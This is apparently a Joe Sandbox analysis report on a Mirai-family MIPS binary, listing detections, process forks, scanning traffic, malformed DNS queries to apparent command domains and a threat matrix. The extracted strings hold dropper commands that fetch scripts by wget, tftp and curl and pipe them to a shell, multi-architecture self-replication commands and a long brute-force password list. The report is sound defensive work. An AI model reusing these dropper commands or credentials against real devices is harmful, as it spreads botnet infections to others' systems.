Edit tour

Linux Analysis Report
mips.elf

Overview

General Information

Sample name:mips.elf
Analysis ID:1611370
MD5:3c8a517caf2e285e584747f21b3c90e3
SHA1:7e795c9512d298a5f497f6a946a5a0b04ff3ffd4
SHA256:0c4618c5f0a988c3f0205aab766a9b48d71d649e3c1a49042b1df90b949a5a5b
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:84
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample tries to kill multiple processes (SIGKILL)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1611370
Start date and time:2025-02-10 20:18:25 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mips.elf
Detection:MAL
Classification:mal84.spre.troj.linELF@0/0@26/0
  • VT rate limit hit for: cats-master.ru. [malformed]
  • VT rate limit hit for: gokittler.ru. [malformed]
  • VT rate limit hit for: kittler.ru. [malformed]
Command:/tmp/mips.elf
PID:6216
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:
  • system is lnxubuntu20
  • mips.elf (PID: 6216, Parent: 6134, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mips.elf
    • mips.elf New Fork (PID: 6218, Parent: 6216)
      • mips.elf New Fork (PID: 6220, Parent: 6218)
      • mips.elf New Fork (PID: 6222, Parent: 6218)
      • mips.elf New Fork (PID: 6224, Parent: 6218)
  • gdm3 New Fork (PID: 6249, Parent: 1320)
  • Default (PID: 6249, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6254, Parent: 1320)
  • Default (PID: 6254, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • xfdesktop (PID: 6257, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfce4-panel (PID: 6259, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
  • xfwm4 (PID: 6261, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
  • xfdesktop (PID: 6263, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfce4-panel (PID: 6265, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
  • xfwm4 (PID: 6267, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
  • xfdesktop (PID: 6269, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
mips.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    mips.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6216.1.00007faecc400000.00007faecc41d000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        6216.1.00007faecc400000.00007faecc41d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6222.1.00007faecc400000.00007faecc41d000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            6222.1.00007faecc400000.00007faecc41d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6220.1.00007faecc400000.00007faecc41d000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: mips.elfAvira: detected
                Source: mips.elfReversingLabs: Detection: 42%
                Source: mips.elfVirustotal: Detection: 46%Perma Link
                Source: mips.elfString: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0

                Networking

                barindex
                Source: global trafficTCP traffic: 185.93.89.106 ports 38241,1,2,3,4,8
                Source: global trafficDNS traffic detected: malformed DNS query: kittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: cats-master.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: polizei.su. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: newkittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: kittlerer.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: gokittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: qittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: thekittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: mykittler.ru. [malformed]
                Source: global trafficTCP traffic: 192.168.2.23:39702 -> 185.93.89.106:38241
                Source: /tmp/mips.elf (PID: 6216)Socket: 127.0.0.1:39148Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 192.35.75.23
                Source: unknownTCP traffic detected without corresponding DNS query: 192.35.75.23
                Source: unknownTCP traffic detected without corresponding DNS query: 188.35.191.195
                Source: unknownTCP traffic detected without corresponding DNS query: 25.116.95.17
                Source: unknownTCP traffic detected without corresponding DNS query: 188.35.191.195
                Source: unknownTCP traffic detected without corresponding DNS query: 211.140.50.110
                Source: unknownTCP traffic detected without corresponding DNS query: 25.116.95.17
                Source: unknownTCP traffic detected without corresponding DNS query: 41.83.76.194
                Source: unknownTCP traffic detected without corresponding DNS query: 211.140.50.110
                Source: unknownTCP traffic detected without corresponding DNS query: 41.83.76.194
                Source: unknownTCP traffic detected without corresponding DNS query: 163.224.220.195
                Source: unknownTCP traffic detected without corresponding DNS query: 175.202.252.137
                Source: unknownTCP traffic detected without corresponding DNS query: 163.224.220.195
                Source: unknownTCP traffic detected without corresponding DNS query: 75.184.195.174
                Source: unknownTCP traffic detected without corresponding DNS query: 175.202.252.137
                Source: unknownTCP traffic detected without corresponding DNS query: 108.58.16.54
                Source: unknownTCP traffic detected without corresponding DNS query: 75.184.195.174
                Source: unknownTCP traffic detected without corresponding DNS query: 197.122.2.94
                Source: unknownTCP traffic detected without corresponding DNS query: 108.58.16.54
                Source: unknownTCP traffic detected without corresponding DNS query: 163.135.230.101
                Source: unknownTCP traffic detected without corresponding DNS query: 197.122.2.94
                Source: unknownTCP traffic detected without corresponding DNS query: 163.135.230.101
                Source: unknownTCP traffic detected without corresponding DNS query: 181.69.121.168
                Source: unknownTCP traffic detected without corresponding DNS query: 63.190.64.54
                Source: unknownTCP traffic detected without corresponding DNS query: 181.69.121.168
                Source: unknownTCP traffic detected without corresponding DNS query: 34.163.125.203
                Source: unknownTCP traffic detected without corresponding DNS query: 63.190.64.54
                Source: unknownTCP traffic detected without corresponding DNS query: 134.12.253.14
                Source: unknownTCP traffic detected without corresponding DNS query: 34.163.125.203
                Source: unknownTCP traffic detected without corresponding DNS query: 38.207.138.11
                Source: unknownTCP traffic detected without corresponding DNS query: 134.12.253.14
                Source: unknownTCP traffic detected without corresponding DNS query: 160.181.150.86
                Source: unknownTCP traffic detected without corresponding DNS query: 38.207.138.11
                Source: unknownTCP traffic detected without corresponding DNS query: 160.181.150.86
                Source: unknownTCP traffic detected without corresponding DNS query: 209.123.240.12
                Source: unknownTCP traffic detected without corresponding DNS query: 209.123.240.12
                Source: unknownTCP traffic detected without corresponding DNS query: 88.171.2.111
                Source: unknownTCP traffic detected without corresponding DNS query: 88.171.2.111
                Source: unknownTCP traffic detected without corresponding DNS query: 11.152.5.38
                Source: unknownTCP traffic detected without corresponding DNS query: 175.208.67.239
                Source: unknownTCP traffic detected without corresponding DNS query: 11.152.5.38
                Source: unknownTCP traffic detected without corresponding DNS query: 123.36.135.99
                Source: unknownTCP traffic detected without corresponding DNS query: 175.208.67.239
                Source: unknownTCP traffic detected without corresponding DNS query: 123.36.135.99
                Source: unknownTCP traffic detected without corresponding DNS query: 83.43.155.209
                Source: unknownTCP traffic detected without corresponding DNS query: 83.43.155.209
                Source: unknownTCP traffic detected without corresponding DNS query: 167.37.240.222
                Source: unknownTCP traffic detected without corresponding DNS query: 167.37.240.222
                Source: unknownTCP traffic detected without corresponding DNS query: 161.122.26.73
                Source: global trafficDNS traffic detected: DNS query: cat-are-here.ru
                Source: global trafficDNS traffic detected: DNS query: kittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: gokittler.ru
                Source: global trafficDNS traffic detected: DNS query: cats-master.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: polizei.su. [malformed]
                Source: global trafficDNS traffic detected: DNS query: kittlerer.ru
                Source: global trafficDNS traffic detected: DNS query: kittlez.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: newkittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: kittlerer.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: gokittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: cuttiecats.ru
                Source: global trafficDNS traffic detected: DNS query: cats-master.ru
                Source: global trafficDNS traffic detected: DNS query: qittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: thekittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: mykittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: mykittler.ru
                Source: mips.elfString found in binary or memory: http:///curl.sh
                Source: mips.elfString found in binary or memory: http:///wget.sh
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

                System Summary

                barindex
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 720, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 721, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1475, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1576, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1601, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1877, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1900, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1983, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2028, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2048, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2050, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2062, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2063, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2069, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2074, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2097, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2123, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2126, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6194, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6220, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6222, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6250, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6255, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6256, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6257, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6258, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6259, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6260, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6261, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6262, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6263, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6264, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6265, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6266, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6267, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6268, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6269, result: successfulJump to behavior
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
                Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
                Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > .d
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: 654321
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 720, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 721, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1475, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1576, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1601, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1877, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1900, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 1983, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2028, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2048, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2050, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2062, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2063, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2069, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2074, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2097, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2123, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 2126, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6194, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6220, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6222, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6250, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6255, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6256, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6257, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6258, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6259, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6260, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6261, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6262, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6263, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6264, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6265, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6266, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6267, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6268, result: successfulJump to behavior
                Source: /tmp/mips.elf (PID: 6224)SIGKILL sent: pid: 6269, result: successfulJump to behavior
                Source: classification engineClassification label: mal84.spre.troj.linELF@0/0@26/0
                Source: /tmp/mips.elf (PID: 6216)Queries kernel information via 'uname': Jump to behavior
                Source: mips.elf, 6216.1.00005608aa4fb000.00005608aa582000.rw-.sdmp, mips.elf, 6220.1.00005608aa4fb000.00005608aa582000.rw-.sdmp, mips.elf, 6222.1.00005608aa4fb000.00005608aa582000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/mips
                Source: mips.elfBinary or memory string: vmware
                Source: mips.elf, 6216.1.00005608aa4fb000.00005608aa582000.rw-.sdmp, mips.elf, 6220.1.00005608aa4fb000.00005608aa582000.rw-.sdmp, mips.elf, 6222.1.00005608aa4fb000.00005608aa582000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
                Source: mips.elfBinary or memory string: @nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearichardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword123456789Metallicacowboy1999654321slipknotstarwarsCharlie1997daddyRootdragonhustonfuckmepussytrustno1cowboysfootballsmcadminsysadmvmwareprofensegamezlrkr0x123qwesuperuserIntraStackAsantecraftcrftpwfriendrootmeP@55w0rd!debugrainCisconsrootinformixmediatorqwe123db2fenc1ibmdb2forgotvideoinfobloxdb2inst1nagiosxiiclocktimelyenablediagdraytekdbadminsq!us3rglftpddiagdangerapcAlphanetworkswrgg15_di524adminHWapacheabcwebserverapache123arpwatchavinashaspbackupadminazzakhalelbackuppukcabasteriskbackupscmhealthbadservercactielliebackup1234cloudcbscbs123billsupermenbenutzerpasswortftp1234annie2013annie2015annie2012annie2014jvcepicrouter
                Source: mips.elf, 6216.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp, mips.elf, 6220.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp, mips.elf, 6222.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.elf
                Source: mips.elf, 6216.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp, mips.elf, 6220.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmp, mips.elf, 6222.1.00007ffdcbe70000.00007ffdcbe91000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
                Source: mips.elfBinary or memory string: vmware123

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: mips.elf, type: SAMPLE
                Source: Yara matchFile source: 6216.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6222.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6220.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: mips.elf, type: SAMPLE
                Source: Yara matchFile source: 6216.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6222.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6220.1.00007faecc400000.00007faecc41d000.r-x.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path InterceptionDirect Volume Access1
                Brute Force
                11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network Medium1
                Service Stop
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
                Application Layer Protocol
                Traffic DuplicationData Destruction
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
